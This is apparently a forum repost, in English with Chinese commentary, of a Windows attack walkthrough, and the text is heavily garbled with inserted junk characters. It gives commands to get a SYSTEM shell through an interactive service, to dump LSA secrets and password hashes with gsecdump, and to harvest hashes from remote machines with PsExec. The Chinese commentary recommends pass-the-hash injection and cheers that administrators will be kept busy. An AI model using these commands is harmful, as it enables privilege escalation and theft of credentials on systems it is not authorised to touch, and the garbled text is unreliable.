o get a DOS Prompt as NT system: d: j; W s" s% h3 j: L
; N1 Z& q7 |6 |$ _4 ]& y
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact! y+ v. B! ] z$ }' ]- v
[SC] CreateService SUCCESS. a+ g# D( i! s! l" g* j0 N3 ?
4 V3 m. ]; |1 T& {% w" N
C:\>sc start shellcmdline
C5 {$ S* m/ x2 c[SC] StartService FAILED 1053:& J; y$ c- `# _( H
* J7 I1 ^/ @% ]- S% S* H
The service did not respond to the start or control request in a timely fashion." p4 x1 i* J6 {* `7 c% ^5 h$ M$ Z1 x
) t0 G* [1 I; G0 z- jC:\>sc delete shellcmdline
" I& [/ q8 o7 Y, m[SC] DeleteService SUCCESS' R% p9 v! h1 R/ g( a/ }
1 b B- ?9 o$ p9 g
------------
( ?4 \" B; f* s, J$ d. m
& \' D% D9 d% g5 w3 \' @Then in the new DOS window:( X! S; T* U9 b0 W# S" C0 H) u% H; a8 c
3 T' E% F+ h( G0 p; ~. VMicrosoft Windows XP [Version 5.1.2600]+ v/ w- q0 o M. v3 K
(C) Copyright 1985-2001 Microsoft Corp.
) O* G. t5 ~& {& i6 u! q V, h6 B- z* a3 j
C:\WINDOWS\system32>whoami! r* B- l, W2 a& A/ r& }- H, T- ?
NT AUTHORITY\SYSTEM& [& w9 d0 K6 P: d- g
5 e; b' H0 J* |2 d
C:\WINDOWS\system32>gsecdump -h: t# f5 L d( [: A6 n: _3 c
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
) ]( e2 Q, ?, n* `2 |) J x, |1 ?& c% wusage: gsecdump [options]( O/ r- \! S( {5 X4 u
4 x. K, n$ F4 j7 p
options:
! X$ p7 C2 h( c3 f3 G( Z-h [ --help ] show help
1 h2 W5 t# P! R1 s3 v. }-a [ --dump_all ] dump all secrets
7 w/ J$ U" K2 Y7 I: H-l [ --dump_lsa ] dump lsa secrets
& q& N2 e5 V0 ~, h-w [ --dump_wireless ] dump microsoft wireless connections' Y: X8 Q0 D/ A$ T
-u [ --dump_usedhashes ] dump hashes from active logon sessions
: y9 W% [% B: H& u; {; v" F-s [ --dump_hashes ] dump hashes from SAM/AD
1 O" }) {; X' a z* x: n! T4 _1 L0 g1 H; ~; s
Although I like to use:
, F( R2 t5 j# [7 f7 Q: z# F/ p
: S! i' c4 `* n( I/ yPsExec v1.83 - Execute processes remotely1 t7 [3 Q( s5 v0 w
Copyright (C) 2001-2007 Mark Russinovich3 y5 `, X" B) |/ ^
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
# G m' f; Q8 d, J6 r+ T. Y K) |( I) @, o E: k0 V
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT" F9 m& {5 `9 r+ k3 V8 R
' p5 P" N6 Q( m7 K& i& t) Y, m
to get the hashes from active logon sessions of a remote system.
9 M) V# u5 B5 u% H2 J
" F8 ]* \0 Q8 ?- o0 q& \These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
; g' \, N2 c% H, Z9 ~& x1 O) b& _; e# {) B8 i5 d u7 B. K) k4 D9 K! c
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了." f7 o' `- x7 z' h- l% [2 q" e
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]$ C9 k( B' d' z
! h( h; o: I; X" i, z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
# F& V% J; R$ i+ M0 t4 m; K, x |